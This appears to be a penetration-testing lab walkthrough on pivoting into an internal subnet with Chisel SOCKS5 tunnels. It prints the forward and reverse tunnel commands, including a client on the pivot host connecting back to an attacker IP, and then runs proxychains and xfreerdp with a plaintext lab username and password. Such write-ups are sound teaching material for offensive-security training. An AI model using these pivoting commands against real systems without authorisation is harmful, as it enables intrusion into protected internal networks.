SOCKS5 Tunneling with Chisel

The Chisel tools both works over HTTP and SSH. The HTTP protocol is used to transport data while the SSH protocol is to secure the communications. Chisel binaries are both available for Linux and Windows. We can also build the binary on our own machine but this would require Go (Golang) installed. It can be used to create a TCP/UDP SOCKS tunnel between two different subnets. Chisel works with both a client and a server.

Note that the same version of Chisel is needed for both the client and server.

When to use?

• Can ben an alternative when establishing an SSH session with the pivot host is not possible.

Downsides

• Requires proxychains

Running the server on the pivot host

We transferred the Chisel binary on the pivot host using the scp utility. The pivot host has two network interface and one is attached to the 172.16.5.0/23 network. The following command was used to start the Chisel server. The server listen on port 1234 for any connection and will forward the traffic to all network the pivot host is attached to using SOCKS 5.

ubuntu@WEB01:~$ ./chisel_1.8.1_linux_amd64 server -v -p 1234 --socks5

On our attacker machine, we ran the Chisel client that connected to the Chisel server on port 1234.

./chisel_1.8.1_linux_amd64 client -v 10.129.202.64:1234 socks

Running the chisel client on the attacker box

As it can be seen below, a successful connection has been established between the Chisel server and the client. The Chisel client listening on port 1080 by default for any incoming connection.

Chisel server - connection established

Configuring proxychains

Now, we have to configure the /etc/proxychains.conf file to forward all our localhost traffic to port 1080.

Socks 5 listening on port 1080

Now, that our tunnel and SOCKS proxy are configured. We can use the tunnel to RDP into a Windows system located in the 172.16.5.0./23 subnet.

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

RDP session on 172.16.5.19

Reverse Pivot

Chisel can also be used to configure a reverse tunnel from the pivot host to our attacker machine. Unlike the previous scenario, the server will run on our attacker box and the client will connect back to our Chisel server from the pivot. Reverse tunneling is handy when inbounds connections to the pivot host are blocked by firewalls.

Setting up the server

The following command starts the Chisel server on our attacker host. The port 1234 is listening for the Chisel client connection. Similarly to the previous scenario, the SOCKS proxy port used by default is 1080.

sudo ./chisel_1.8.1_linux_amd64 server --reverse -v -p 1234 --socks5

Connect the client

On the pivot server, we used the below command to connect the Chisel client to our Chisel server on port 1234.

./chisel client -v 10.10.14.136:1234 R:socks

Chisel client establishing a connection with the server on port 1234

Chisel server - connection established with the client

Similarly to the previous scenario, we can configure our proxychains.conf file to set the listener on port 1080. We can then use proxychains and xfreerdp to establish a RDP session to the Windows target server located on the 172.16.5.0/23 network.